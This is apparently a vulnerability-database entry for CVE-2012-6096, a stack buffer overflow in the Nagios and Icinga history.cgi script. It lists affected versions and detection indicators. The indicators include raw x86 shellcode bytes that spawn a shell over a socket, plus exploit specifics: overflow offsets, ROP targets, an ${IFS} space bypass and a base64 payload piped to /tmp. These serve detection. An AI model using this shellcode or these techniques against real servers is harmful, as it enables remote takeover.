cbcvebase.
CVE-2012-6096
published 2013-01-22

CVE-2012-6096: Multiple stack-based buffer overflows in the get_history function in history.cgi in Nagios Core before 3.4.4, and Icinga 1.6.x before 1.6.2, 1.7.x before…

PriorityP271high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
66.45%
99.2th percentile
Multiple stack-based buffer overflows in the get_history function in history.cgi in Nagios Core before 3.4.4, and Icinga 1.6.x before 1.6.2, 1.7.x before 1.7.4, and 1.8.x before 1.8.4, might allow remote attackers to execute arbitrary code via a long (1) host_name variable (host parameter) or (2) svc_description variable.

Affected

29 ranges· showing 25
VendorProductVersion rangeFixed in
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
icingaicinga
nagiosnagios<= 3.4.3
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios
nagiosnagios

Detection & IOCsextracted from sources · hover to see the quote

path/nagios3/cgi-bin/history.cgi
path/cgi-bin/history.cgi
bytes
31c031db31c951b10651b10151b10251 89e1b301b066cd8089c231c031c95151 68badc0ded6668b0efb102665189e7b3 1053575289e1b303b066cd8031c939c1 740631c0b001cd8031c0b03f89d3cd80 31c0b03f89d3b101cd8031c0b03f89d3 b102cd8031c031d250686e2f7368682f 2f626989e3505389e1b00bcd8031c0b0 01cd80
  • Monitor HTTP GET requests to history.cgi with an oversized 'host' parameter (exceeding normal hostname length) — this is the primary exploitation vector for the stack-based buffer overflow.
  • Detect exploitation attempts by looking for base64-encoded ELF payloads in the 'host' GET parameter of requests to history.cgi, often followed by pipe to base64 -d and tee to /tmp.
  • Detect use of ${IFS} in the 'host' CGI parameter as a space-bypass technique used by exploits targeting this vulnerability.
  • Alert on HTTP Basic Authentication headers combined with requests to history.cgi containing abnormally long 'host' query parameters (offsets 0xc37–0xc43 bytes) followed by ROP chain bytes.
  • The exploit requires at least one ALERT entry to be present in the Nagios history page; check for probing GET requests to history.cgi without a host parameter as reconnaissance.
  • ·The ROP-based exploit targets specific Nagios binary builds; the hardcoded addresses (unescape, popret, hostbuf, system@PLT) are only valid for the listed target packages and will not work against binaries compiled with ASLR/PIE.
  • ·On distros with SSP and FORTIFY_SOURCE enabled (e.g., Red Hat/CentOS), the overflow is not believed to be exploitable for RCE and would result only in denial of service to the sending user.
  • ·Payload space is constrained to 200 bytes due to a system() parameter length limitation; the payload is base64-encoded to avoid bad characters.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.